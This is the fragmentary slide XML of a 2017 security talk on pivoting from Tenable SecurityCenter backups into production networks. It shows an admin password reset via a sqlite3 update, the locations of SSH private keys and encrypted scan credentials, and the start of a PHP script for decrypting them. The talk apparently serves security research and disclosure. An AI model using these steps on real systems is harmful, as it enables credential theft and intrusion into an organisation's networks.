    <p:sldLayoutId id="2147483718" r:id="rId30"/>
    <p:sldLayoutId id="2147483736" r:id="rId31"/>
    <p:sldLayoutId id="2147483737" r:id="rId32"/>
    <p:sldLayoutId id="2147483693" r:id="rId33"/>
    <p:sldLayoutId id="2147483713" r:id="rId34"/>
    <p:sldLayoutId id="2147483714" r:id="rId35"/>
    <p:sldLayoutId id="2147483725" r:id="rId36"/>
    <p:sldLayoutId id="2147483726" r:id="rId37"/>
    <p:sldLayoutId id="2147483727" r:id="rId38"/>
    <p:sldLayoutId id="2147483666" r:id="rId39"/>
    <p:sldLayoutId id="2147483724" r:id="rId40"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="110000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2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6000" indent="-126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126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378000" indent="-126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504000" indent="-126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950" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="630000" indent="-126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40" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="5420" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="18" orient="horz" pos="2880" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="19" pos="2358" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="20" pos="2993" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="21" pos="2767" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="23" orient="horz" pos="2787" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="24" orient="horz" pos="9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tenable.com/sccv/5_4/Content/SystemConfiguration.htm?Highlight=publishing%20site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9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tenable.com/support-center/nessus_compliance_reference.pdf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00" y="1431542"/>
            <a:ext cx="7038000" cy="1565658"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jumping from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tenable's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SecurityCenter CV to production environments</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Oleksandr Kazymyrov</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB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 dirty="0"/>
              <a:t>23 May, 2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128249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9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457063" y="1095341"/>
            <a:ext cx="4264405" cy="3450282"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="231775" indent="-231775">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The same major version of Centos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" indent="-231775">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backup files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" indent="-231775">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pP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init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/SecurityCenter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" indent="-231775">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="231775" indent="-231775">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tns:tns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="231775" indent="-231775">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hostname [SecurityCenter name] # to activate the license</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" indent="-231775">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>opt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/support/bin/sqlite3 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>opt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>application.db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>userauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> = '2dd58dd6c36485e630892dfe7525b33b'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username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>';" # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> is ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>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nb-NO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: your server needs to be disconnected from the Internet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Backup Files on Centos</a:t>
            </a:r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670" y="1294171"/>
            <a:ext cx="5736648" cy="88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2725617" y="2095615"/>
            <a:ext cx="536329" cy="11125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70"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4976446" y="580615"/>
            <a:ext cx="3711010" cy="367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40080" y="4663440"/>
            <a:ext cx="57951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Source for password reset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0"/>
              <a:t>: http://rich-notes.blogspot.no/2016/05/reset-admin-account-on-security-center.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25587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40068" y="378366"/>
            <a:ext cx="3456968" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Getting Access to SecurityCenter from Backup Files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20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584874" y="1194607"/>
            <a:ext cx="7974250" cy="2693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ls -la /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p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19" y="1463998"/>
            <a:ext cx="4177582" cy="121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74" y="2836100"/>
            <a:ext cx="7994400" cy="57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649" y="3567680"/>
            <a:ext cx="2733675" cy="40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505362" y="4052465"/>
            <a:ext cx="7974250" cy="53839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26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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>User: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="2743200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Private key: /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>id_rsa</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" b="1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1162231" y="4177312"/>
            <a:ext cx="2101805" cy="28870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26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      Looted credentials &gt;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4622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to DMZ</a:t>
            </a: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1344168" y="378366"/>
            <a:ext cx="7114032" cy="411898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655" y="3486361"/>
            <a:ext cx="383231" cy="37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698" y="1869005"/>
            <a:ext cx="619808" cy="394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805" y="2822984"/>
            <a:ext cx="613463" cy="390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136" y="3190850"/>
            <a:ext cx="438264" cy="327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600" y="3532723"/>
            <a:ext cx="678239" cy="32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412" y="3862874"/>
            <a:ext cx="613463" cy="390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188" y="2426753"/>
            <a:ext cx="595789" cy="2845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502" y="3981782"/>
            <a:ext cx="442107" cy="3300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572" y="3973574"/>
            <a:ext cx="613463" cy="3908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6062" y="2866579"/>
            <a:ext cx="442107" cy="3300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9083" y="2879375"/>
            <a:ext cx="488862" cy="3114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77576" y="2006868"/>
            <a:ext cx="602299" cy="3393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77576" y="2006868"/>
            <a:ext cx="602299" cy="3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1.85185E-6 L 0.12882 1.85185E-6 C 0.15746 0.00586 0.17378 0.00062 0.18351 0.02778 C 0.19271 0.05525 0.18177 0.11666 0.18472 0.16327 C 0.1875 0.20895 0.18472 0.25555 0.18507 0.28426 C 0.18472 0.31018 0.25781 0.30092 0.25781 0.32654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an Organization</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO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786908265"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="539999" y="1295883"/>
          <a:ext cx="8083496" cy="30657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76152">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3560192494"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5107344">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2643769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Path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802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/opt/sc/orgs/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>orgID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nl-NL" dirty="0"/>
                        <a:t>/VDB/[date]/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Unencrypted scan results in raw, Nessus or Nessus DB format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47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/opt/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>sc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>/orgs/[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>orgID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>]/uploads/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custom upload files (e.g., private keys, audit files, etc.)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988846"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2202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/opt/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>sc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>/orgs/[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>orgID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>]/logs/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files (internal </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>SecurityCenter's</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> IDs, customer specified name (e.g., asset name, scan name, report names,  etc.), usernames, IP addresses of users)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242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/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>opt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>sc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>orgs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>orgID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>assets.db</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>opt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>sc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>orgs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>orgID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>assets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO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on assets</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(IPs, server names, friendly names, descriptions, etc.)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807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/opt/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>sc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>/orgs/[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>orgID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>]/users/[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>userID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>]/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 specific information (e.g., dashboards or reports)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613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/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>opt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>sc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>orgs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>orgID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>organization.db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technical information about an organization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457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08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378366"/>
            <a:ext cx="4142836" cy="1000274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nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>opt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>orgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>orgID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>organization.db</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO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3263279912"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="540000" y="985183"/>
          <a:ext cx="7766513" cy="3444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9730">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2643769905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2945713519"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4641274">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2764253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Table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802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PolicyPref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effectLst/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>authPref</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>]*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Encrypted credentials (e.g., SNMP, x509, SCCM, WSUS, VMware ESX, VMware </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>vC</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>enter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>, FTP, IPMI, etc.) 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1807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[TYPE]Credential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TYPE: SSH, SNMP, Windows, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Databse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>, etc.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SSHCredential</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>: username, password, private key (the name of uploaded file), passphrase (for the private key), privilege escalation command, etc.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DatabseCredential</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>: login, password (encrypted), SID, port and DB type.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245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Definition (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Type:email</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>)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Emails and the content of messages (can be used for spear phishing)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45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Credential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Creator ID, owner ID and type of used credentials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417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Username, first / last name, email, address, etc.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2131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27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68" y="378366"/>
            <a:ext cx="3325350" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/orgs/[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>orgID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]/uploads/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20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="1225043"/>
            <a:ext cx="8064250" cy="3147111"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom audit files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH keys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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1875124"/>
            <a:ext cx="7689600" cy="8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75" y="3104145"/>
            <a:ext cx="7258050" cy="7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0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67" y="378366"/>
            <a:ext cx="4045787" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decryption of Encrypted Data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20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="1255169"/>
            <a:ext cx="8064250" cy="3158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PHP script to decrypt encrypted credentials (need to be saved in /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sc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/tools/):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/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>defines.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>";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/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t> = SCROOT;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 err="1"/>
              <a:t>dbLib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>setup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>(NOT_SET,TRUE);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/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t> = $GLOBALS['</a:t>
            </a:r>
            <a:r>
